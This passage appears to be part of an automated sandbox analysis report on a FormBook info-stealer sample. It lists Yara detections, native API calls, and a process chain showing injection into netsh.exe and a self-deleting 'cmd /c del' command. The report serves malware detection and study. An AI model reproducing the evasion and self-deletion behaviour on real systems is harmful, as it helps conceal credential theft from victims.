          Source: vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: vBugmobiJh.exe, 00000001.00000003.216854776.0000000005725000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de
          Source: vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: vBugmobiJh.exe, 00000001.00000002.229831410.00000000026F1000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match | File source: 00000006.00000002.267925714.0000000000980000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.267841764.00000000005D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000002.473763898.0000000002FD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.230287817.00000000036F9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000002.472446069.0000000000F40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.267667639.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000002.475304202.0000000003350000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 6.2.vBugmobiJh.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.2.vBugmobiJh.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.vBugmobiJh.exe.382c390.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.vBugmobiJh.exe.387b9b0.3.raw.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000006.00000002.267925714.0000000000980000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.267925714.0000000000980000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.267841764.00000000005D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.267841764.00000000005D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.473763898.0000000002FD0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.473763898.0000000002FD0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.230287817.00000000036F9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.230287817.00000000036F9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.472446069.0000000000F40000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.472446069.0000000000F40000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.267667639.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.267667639.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.475304202.0000000003350000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.475304202.0000000003350000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.vBugmobiJh.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.vBugmobiJh.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.vBugmobiJh.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.vBugmobiJh.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.vBugmobiJh.exe.382c390.2.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.vBugmobiJh.exe.382c390.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.vBugmobiJh.exe.387b9b0.3.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.vBugmobiJh.exe.387b9b0.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          .NET source code contains very large strings
          Source: vBugmobiJh.exe, LogIn.cs | Long String: Length: 13656
          Source: 1.0.vBugmobiJh.exe.2d0000.0.unpack, LogIn.cs | Long String: Length: 13656
          Source: 1.2.vBugmobiJh.exe.2d0000.0.unpack, LogIn.cs | Long String: Length: 13656
          Source: 4.2.vBugmobiJh.exe.150000.0.unpack, LogIn.cs | Long String: Length: 13656
          Source: 4.0.vBugmobiJh.exe.150000.0.unpack, LogIn.cs | Long String: Length: 13656
          Source: 6.2.vBugmobiJh.exe.430000.1.unpack, LogIn.cs | Long String: Length: 13656
          Source: 6.0.vBugmobiJh.exe.430000.0.unpack, LogIn.cs | Long String: Length: 13656
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Code function: 6_2_004181B0 NtCreateFile,
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Code function: 6_2_00418260 NtReadFile,
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Code function: 6_2_004182E0 NtClose,
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Code function: 6_2_00418390 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Code function: 6_2_004181AA NtCreateFile,
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Code function: 6_2_0041825C NtReadFile,
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Code function: 6_2_004182DA NtClose,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03BA9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03BA99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03BA9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03BA9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03BA9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03BA9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03BA9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03BA9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03BA96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03BA96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03BA95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03BA9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03BAA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03BA9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03BA9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03BA9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03BA9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03BA9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03BA99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03BA9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03BA98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03BA98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03BA9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03BAB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03BA97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03BA9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03BAA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03BAA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03BA9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03BA9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03BA9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03BA9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03BA9660 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03BA9650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03BA95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03BAAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03BA9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03BA9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_00F581B0 NtCreateFile,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_00F582E0 NtClose,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_00F58260 NtReadFile,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_00F581AA NtCreateFile,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_00F582DA NtClose,
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_00F5825C NtReadFile,
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Code function: 1_2_00CBC2B0
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Code function: 1_2_00CB9990
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Code function: 1_2_0709C6D8
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Code function: 1_2_0709B6E8
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Code function: 1_2_07090040
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Code function: 1_2_07092F78
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Code function: 1_2_07092F88
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Code function: 1_2_0709B6D8
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Code function: 1_2_07092D28
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Code function: 1_2_07092D38
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Code function: 1_2_07090D90
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Code function: 1_2_07096291
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Code function: 1_2_0709E9A8
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Code function: 6_2_0040102F
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Code function: 6_2_00401030
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Code function: 6_2_00408C4C
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Code function: 6_2_00408C50
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Code function: 6_2_0041B493
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Code function: 6_2_0041CD28
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Code function: 6_2_00402D87
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Code function: 6_2_00402D90
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Code function: 6_2_0041CE77
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Code function: 6_2_00402FB0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03B9EBB0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03C2DBD2
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03C203DA
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03C32B28
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03C322AE
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03B84120
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03B6F900
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03B920A0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03B7B090
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03C328EC
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03C320A8
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03C21002
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03C3E824
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03C3DFCE
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03C31FF1
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03C32EF7
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03B86E30
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03C2D616
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03C325DD
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03B92581
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03B7D5E0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03B60D20
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03C31D55
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03C32D07
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03C2D466
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_03B7841F
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_00F5B493
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_00F48C50
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_00F48C4C
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_00F42D90
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_00F42D87
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_00F5CD28
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_00F5CE77
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 10_2_00F42FB0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: String function: 03B6B150 appears 39 times
          Source: vBugmobiJh.exe | Binary or memory string: OriginalFilename vs vBugmobiJh.exe
          Source: vBugmobiJh.exe, 00000001.00000002.229831410.00000000026F1000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameriched20.dllp( vs vBugmobiJh.exe
          Source: vBugmobiJh.exe, 00000001.00000002.229831410.00000000026F1000.00000004.00000001.sdmp | Binary or memory string: l,\\StringFileInfo\\000004B0\\OriginalFilename vs vBugmobiJh.exe
          Source: vBugmobiJh.exe, 00000001.00000002.229831410.00000000026F1000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameAsyncState.dllF vs vBugmobiJh.exe
          Source: vBugmobiJh.exe, 00000001.00000002.227808975.00000000002D2000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameKerbLogonSubmitType.exe6 vs vBugmobiJh.exe
          Source: vBugmobiJh.exe, 00000001.00000002.230287817.00000000036F9000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameLegacyPathHandling.dllN vs vBugmobiJh.exe
          Source: vBugmobiJh.exe | Binary or memory string: OriginalFilename vs vBugmobiJh.exe
          Source: vBugmobiJh.exe, 00000004.00000002.226155480.0000000000152000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameKerbLogonSubmitType.exe6 vs vBugmobiJh.exe
          Source: vBugmobiJh.exe | Binary or memory string: OriginalFilename vs vBugmobiJh.exe
          Source: vBugmobiJh.exe, 00000006.00000002.268144606.0000000000EBC000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamenetsh.exej% vs vBugmobiJh.exe
          Source: vBugmobiJh.exe, 00000006.00000002.268267723.0000000000FDF000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs vBugmobiJh.exe
          Source: vBugmobiJh.exe, 00000006.00000000.226888250.0000000000432000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameKerbLogonSubmitType.exe6 vs vBugmobiJh.exe
          Source: vBugmobiJh.exe | Binary or memory string: OriginalFilenameKerbLogonSubmitType.exe6 vs vBugmobiJh.exe
          Source: vBugmobiJh.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000006.00000002.267925714.0000000000980000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.267925714.0000000000980000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.267841764.00000000005D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.267841764.00000000005D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.473763898.0000000002FD0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.473763898.0000000002FD0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.230287817.00000000036F9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.230287817.00000000036F9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.472446069.0000000000F40000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.472446069.0000000000F40000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.267667639.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.267667639.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.475304202.0000000003350000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.475304202.0000000003350000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.vBugmobiJh.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.vBugmobiJh.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.vBugmobiJh.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.vBugmobiJh.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.vBugmobiJh.exe.382c390.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.vBugmobiJh.exe.382c390.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.vBugmobiJh.exe.387b9b0.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.vBugmobiJh.exe.387b9b0.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: vBugmobiJh.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vBugmobiJh.exe, LogIn.cs | Base64 encoded string
Source: 1.0.vBugmobiJh.exe.2d0000.0.unpack, LogIn.cs | Base64 encoded string
Source: 1.2.vBugmobiJh.exe.2d0000.0.unpack, LogIn.cs | Base64 encoded string
Source: 4.2.vBugmobiJh.exe.150000.0.unpack, LogIn.cs | Base64 encoded string
Source: 4.0.vBugmobiJh.exe.150000.0.unpack, LogIn.cs | Base64 encoded string
Source: 6.2.vBugmobiJh.exe.430000.1.unpack, LogIn.cs | Base64 encoded string
Source: 6.0.vBugmobiJh.exe.430000.0.unpack, LogIn.cs | Base64 encoded string
Source: classification engine | Classification label: mal100.troj.evad.winEXE@9/1@15/5
Source: C:\Users\user\Desktop\vBugmobiJh.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vBugmobiJh.exe.log
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5808:120:WilError_01
Source: vBugmobiJh.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\vBugmobiJh.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\vBugmobiJh.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: vBugmobiJh.exe, 00000001.00000002.229831410.00000000026F1000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: vBugmobiJh.exe, 00000001.00000002.229831410.00000000026F1000.00000004.00000001.sdmp | Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: vBugmobiJh.exe | Virustotal: Detection: 25%
Source: unknown | Process created: C:\Users\user\Desktop\vBugmobiJh.exe 'C:\Users\user\Desktop\vBugmobiJh.exe'
Source: unknown | Process created: C:\Users\user\Desktop\vBugmobiJh.exe C:\Users\user\Desktop\vBugmobiJh.exe
Source: unknown | Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\vBugmobiJh.exe'
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\vBugmobiJh.exe | Process created: C:\Users\user\Desktop\vBugmobiJh.exe C:\Users\user\Desktop\vBugmobiJh.exe
Source: C:\Windows\SysWOW64\netsh.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\vBugmobiJh.exe'
